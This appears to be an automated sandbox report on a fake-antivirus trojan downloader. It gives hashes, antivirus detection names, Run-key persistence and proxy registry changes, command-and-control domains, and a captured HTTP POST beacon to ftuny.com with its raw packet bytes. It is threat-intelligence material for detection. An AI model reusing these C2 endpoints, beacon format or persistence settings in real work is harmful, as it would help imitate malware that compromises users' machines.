Analysis Date2015-01-17 22:43:37
MD592d6a52edfbb64cf26f36ee5e1053124
SHA1ffe4c00fc789375a4356f905ecb61d509da9941c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d812ff3204a475a9d9226cdcf833b751 sha1: c401f0ff00cbd9148649eea383c248fd1d1ea487 size: 13312
Section.rdata md5: bcfedd3d1f091c5eff9bd0f7116b3819 sha1: 6d8d7ce902593002ef547c836295c8824c7f818a size: 2560
Section.data md5: fe963598cc5e1c82f5e20497e3de9fc2 sha1: 25f8231d425a9c58332561faef6d9ba078c13530 size: 110080
Section.rsrc md5: 4c3d737cb017a76e1c58bfb4d2cd5e23 sha1: ecbd48e54186e70f66e93317e82269c444e732a2 size: 5120
Timestamp2009-08-03 13:19:57
VersionLegalCopyright: Copyright © 2010 Setup Technologies Q
InternalName: set_up ux
FileVersion: 4.1.0.0
CompanyName: Jordan Russell
LegalTrademarks:
Comments:
ProductName: 80 Internet Security JQ
ProductVersion: 4.1.0.0
FileDescription: m Setup Self-Extractor
OriginalFilename: set_up ux
PEhash2a08dd95da2bef4b1ecdd505468c39b6f596c551
IMPhashacb0fa4e144de036990eeae9a951869f
AV360 Safeno_virus
AVAd-AwareGen:Heur.FKP.1
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Gen:Heur.FKP.1
AVAuthentiumW32/FakeAlert.KN.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen2
AVBullGuardGen:Heur.FKP.1
AVCA (E-Trust Ino)Win32/Renos.D!generic
AVCAT (quickheal)Trojan.Renos.LN
AVClamAVTrojan.Jorik-298
AVDr. WebTrojan.Siggen2.26087
AVEmsisoftGen:Heur.FKP.1
AVEset (nod32)Win32/TrojanDownloader.FakeAlert.BGV
AVFortinetW32/Diple.IZ!tr
AVFrisk (f-prot)W32/FakeAlert.KN.gen!Eldorado
AVF-SecureGen:Heur.FKP.1
AVGrisoft (avg)Win32/Cryptor
AVIkarusTrojan.SuspectCRC
AVK7Trojan-Downloader ( 001359961 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Downloader
AVMcafeeDownloader-CEW.ai
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Renos.LX
AVMicroWorld (escan)Gen:Heur.FKP.1
AVRisingTrojan.Win32.Generic.128513EE
AVSophosMal/FakeAV-IZ
AVSymantecTrojan.FakeAV
AVTrend MicroTROJ_RENOS.SMRK
AVVirusBlokAda (vba32)Trojan.Jorik.Skor

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\CY08W456F0\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CY08W456F0 ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNStopkio.com
Winsock DNSftuny.com

Network Details:

DNSwsj.com
Type: A
205.203.132.65
DNSwsj.com
Type: A
205.203.140.1
DNSwsj.com
Type: A
205.203.140.65
DNSwsj.com
Type: A
205.203.132.1
DNSfastclick.com
Type: A
64.156.167.84
DNSnifty.com
Type: A
210.131.4.217
DNSftuny.com
Type: A
208.73.210.214
DNSftuny.com
Type: A
208.73.210.217
DNSftuny.com
Type: A
208.73.211.178
DNSftuny.com
Type: A
208.73.210.200
DNStopkio.com
Type: A
DNSphreeway.com
Type: A
DNStirefondn.com
Type: A
HTTP POSThttp://ftuny.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 208.73.210.214:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6674756e 792e636f 6d0d0a43 6f6e7465   ftuny.com..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 34310d0a   nt-Length: 341..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x000000e0 (00224)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000f0 (00240)   0a0d0a64 6174613d 2f436a45 665a4453   ...data=/CjEfZDS
0x00000100 (00256)   76787143 694b306c 74554d31 7579322f   vxqCiK0ltUM1uy2/
0x00000110 (00272)   79753455 3559704e 6d31762f 2f6a546e   yu4U5YpNm1v//jTn
0x00000120 (00288)   6756632b 774d732b 2b5a426a 375a5359   gVc+wMs++ZBj7ZSY
0x00000130 (00304)   54723369 426b472f 672b3756 43432f30   Tr3iBkG/g+7VCC/0
0x00000140 (00320)   70557275 4f487037 65526348 5069596f   pUruOHp7eRcHPiYo
0x00000150 (00336)   3939494d 55756a67 55573462 76544964   99IMUujgUW4bvTId
0x00000160 (00352)   4e2f6a50 58754750 6a61427a 786c6363   N/jPXuGPjaBzxlcc
0x00000170 (00368)   356d704e 30316136 742f5169 53585877   5mpN01a6t/QiSXXw
0x00000180 (00384)   707a3948 6d306b7a 39664266 61556e31   pz9Hm0kz9fBfaUn1
0x00000190 (00400)   30782f47 4c636f66 52694834 4c764673   0x/GLcofRiH4LvFs
0x000001a0 (00416)   41694759 46736169 6f4d5730 374b3045   AiGYFsaioMW07K0E
0x000001b0 (00432)   33726b6b 334d655a 55796744 654c4777   3rkk3MeZUygDeLGw
0x000001c0 (00448)   32733132 2b6f504d 4e726e4a 5a637a68   2s12+oPMNrnJZczh
0x000001d0 (00464)   7a5a3878 694e5775 3554674f 6871344f   zZ8xiNWu5TgOhq4O
0x000001e0 (00480)   71555330 424d5464 4b32625a 792f6878   qUS0BMTdK2bZy/hx
0x000001f0 (00496)   33546e6d 47795446 4c48684c 6352662b   3TnmGyTFLHhLcRf+
0x00000200 (00512)   76417a49 4f424e6d 76343343 444b3251   vAzIOBNmv43CDK2Q
0x00000210 (00528)   30354156 636d4138 324b6854 66557373   05AVcmA82KhTfUss
0x00000220 (00544)   2f476f6c 77786c6d 396b4c6e 726e6c49   /Golwxlm9kLnrnlI
0x00000230 (00560)   2b355536 6e333664 2f33346b 6f6c5631   +5U6n36d/34kolV1
0x00000240 (00576)   6136516e 2b773d3d                     a6Qn+w==


Strings
sQ
.};a...
8J
 0;
1.0G.u
]
......m.

040904E4
 2010  Setup Technologies Q
4.1.0.0
80 Internet Security JQ
BBABORT
Cannot open file "%s". %s
Comments
CompanyName
Copyright 
DVCLAL
Error reading %s%s%s: %s
Failed to get data for '%s'
FHPV
FileDescription
FileVersion
InternalName
Invalid argument to date encode
Invalid argument to time encode
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid property element: %s
Invalid property path
Invalid property type: %s
Invalid property value
Invalid stream format$''%s'' is not a valid component name
Jordan Russell
LegalCopyright
LegalTrademarks
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
m Setup Self-Extractor 
MS Sans Serif
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters!'%s' is not a valid integer value('%s' is not a valid floating point value
OriginalFilename
Out of memory
ProductName
ProductVersion
Property is read-only
Property %s does not exist
Resource %s not found
 set_up ux
Sjv9
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Stream read error
Stream write error
StringFileInfo
TEXTFILEDLG
TmoH
Translation
VarFileInfo
VS_VERSION_INFO
yrHD
0difzu^'
0(g '`
0=h'Bo
0u6%G	h
0xvIG'T1
11~BrS
1tgfm3
1{!#{z!
2{5tB,T
>29#?F
2',s9m
2|SVHz
33333333?333333
333333333333333333
3333333333333338
3333339
333338
33333833
333838
3z T[X)#]S0
*#4c~#4z
*#4-#d
#4n!#6T!kQR
/4V8k1
4.vF4 3
~4x*Nw
!~4z1k	
])#4z##4
*#4z!#4d!k
#4z!%5
*#4z7$
#4zF=q}!k
4z!i^zE
!#4z!k
!4z$_X
@(!4zy
55tew~
5`7>hZb
58crypt32
5F)&nK-
)5s(6j
5xdx*Z
5z!#4T!,
6rDj0$
_79f5b9B5zvlqNs@24
7AzyihMm@24
_7FajNBsFkIj4Xt
)7:>]Y
7>Z[)#E
8BCt?6m,
)@}8$CEe
8>YZ7~
/9"4z"bV
9bf5hR
9+=r5+r
A1{[YI
a(bjIJ
ac F4"
}a)CNd
A"G4[&
aHNP8[
#a$p#4z
Apr n8j2w4
b2Q4ZV
b+_/ex,
|bH:rY
BKFg2}
b!L_k)#4
BPdNLUtRo
bURtF<w
b.,Z2D"
c+!E	y
$,cJ#4z
CP60 '
cR0RNtK@16
	c~s/KN
D6\F F$
"d7ue 
@.data
DbmxGJNw
|[dI%Jpg
D]n5XI
+E]9d"
eDYWiJ
eF2HYo
eN6u1a
eqz2sDJ
ExitProcess
FcD#4zWk
FDF KfU
FKu+KFL
FmWgZI
Fn4MOZ1n8Ol@24
FnGn9;
~'fp;.
fSUcdg
"	,f.V
=GeRi#
GetFullPathNameA
GetLastError
GetLocaleInfoA
GetMenu
GetModuleFileNameA
GetSysColorBrush
h& 9^r.mDtM
he@9Dm
'+>^Hf#
hiN3Bj
!#hJ"k
`'HQP VH
}HW#jh
"hw Q4}
I6dx?Q
IA3'>%	
ihMrjq
&I]lLV
ImNGv9
i_	NU_
iXB/)^0!
iyGyot
jL^u+[
jW1;/)q
jypLl:Y
!#@:!k
kernel32.dll
KqazR38CLhQmuf
;KR	Sz
KR[+XN&
L4yNC<P
l9_u_pvC@4
l_N3nnt
LoadCursorA
LoadIconA
LoadKeyboardLayoutA
LoadLibraryA
l	[u|7
+(LV9^
Ly #1-
MFqVAb7Yw
M,NWHs
M@Qm6t
	;nBX;
&=N|Db
&n	`h9_
n?>OSU
:NVItkX
O	6G@8Y4
_O6Ltay0LTb@4
oC6eWtap
Oe`QP3
oj[`;h
_>	^oU
ou3r7sW
	o	`>.x
:p8B^J
pBdf('
;pDtng>pRN*
P g@|B
_pUx_aySM
?)PxnpR
`.rdata
rHQ_;C
^RkEjx
)R=O#]
rOH}&>
@S,78]
SCFEh=;jB
 set_up ux
St*vBj9
Su9eN|
)T.#>-
t49I	%
t8+o|H
TAdH8)$
tAt@HH
t$EhK4`^s
This program must be run under Win32
t"HK2P
tIpF;a
TomaR"8~E
t-qh0/
tVGafB
tZb	K`
u^6C?c
uD0|e]
UNIQSTRgPG9
urKkbjTh
USER32.DLL
uSWtF&
U=T?};
uWjTT91
(v22_%
V"4z!L
va*,8\
^V!C~+
v}DZd(
VirtualAllocEx
 vM;0tq\
v_p 90-
Vziq5p
W)#]<{
W|3E1j
WB+L{8
W)#e:	
wL*9YG
_w@N+I
W)",Q"
WrknE5
W-'XCi
x2pSxmw
X)#4z!#
X)#4z!#)
x7Fx_>
>"X:FK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
Xn/.P>
X)#szD
:>x zY
"(]x&ZY
YG5Nw74r
YK	qW	l
y #,M"A
z!#*@e
z!k@\Va4
ZYge8@